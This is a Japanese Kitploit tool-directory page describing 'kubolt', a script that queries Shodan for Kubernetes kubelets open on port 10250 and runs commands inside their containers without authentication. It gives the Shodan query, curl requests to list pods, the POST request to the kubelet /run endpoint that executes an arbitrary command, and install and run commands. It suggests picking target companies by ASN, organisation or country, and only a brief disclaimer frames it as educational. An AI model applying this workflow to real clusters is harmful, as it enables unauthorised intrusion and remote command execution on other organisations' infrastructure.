Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
kubolt — Kubolt パブリックKubernetesクラスターをスキャンするユーティリティ | Kitploit
ツール/GitHubGitHub/averonesis/kubolt
OSINT (オープンソースインテリジェンス)偵察脆弱性スキャナーコンテナセキュリティクラウドセキュリティ設定ミス
GitHubaveronesis/kubolt

kubolt

Kubolt パブリックKubernetesクラスターをスキャンするユーティリティ

リポジトリを見る
110194年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

何?

Kuboltは、認証されていない公開Kubernetesクラスターをスキャンし、コンテナ内でコマンドを実行するためのシンプルなユーティリティです。

なぜ?

時々、kubeletのポート10250が不正アクセスに対して開いており、kubeletのgetrun関数を使用してコンテナ内でコマンドを実行することが可能になります:

root@kitploit:~
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
	params := getExecRequestParams(request)
	pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
	if !ok {
		response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
		return
	}

どのように?

さあ、私たちの友人Shodanに聞いてみましょう :trollface:

基本的なクエリは

ssl:true port:10250 404

KubeletはデフォルトでSSLを使用してポート10250を使います。404はURLパスなしのHTTP応答です。

KuboltはAPI経由でShodanにIPアドレスのリストを要求し、他のOSINTアクションのためにそれらを保持します 😁

まず、Kubeletに実行中のPodを問い合わせ、応答にUnauthorizedが含まれておらず、containerが含まれているホストをフィルタリングして、その中でコマンドを実行できるようにします。

root@kitploit:~
curl -k https://IP-from-Shodan:10250/runningpods/ 

とにかく、その時点で実行中のPodがないホストを見つけた場合は、次にPodが起動されるかもしれない時のために保持しておいてください 😁

これらのリクエストから利用可能なすべてのPodを一覧表示できます:

root@kitploit:~
curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/ 

次にkuboltは応答を解析し、以下のように新しいリクエストを生成します:

root@kitploit:~
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>" 

以下のようなShodanフィルターを使用して、より正確に企業をターゲットにできます:

  • asn
  • org
  • country
  • net

インストール

root@kitploit:~
mkdir output
pip install -r requirements.txt 

実行

root@kitploit:~
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or
python kubolt.py --query "org:'ACME Corporation' country:UK"

Shodan

KuboltはShodan APIとQuery Creditsを適宜使用します。クエリフィルターなしでツールを実行すると、おそらくすべてのクレジットを消費することになるでしょう ¯\_(ツ)_/¯

デモ

demo

重要

作者によって提供されるツールは教育目的のみに使用されるべきです。作者はツールの誤用について責任を負いません。作者はツールの使用によって生じた直接的または間接的な損害について責任を負いません。

ツールをダウンロード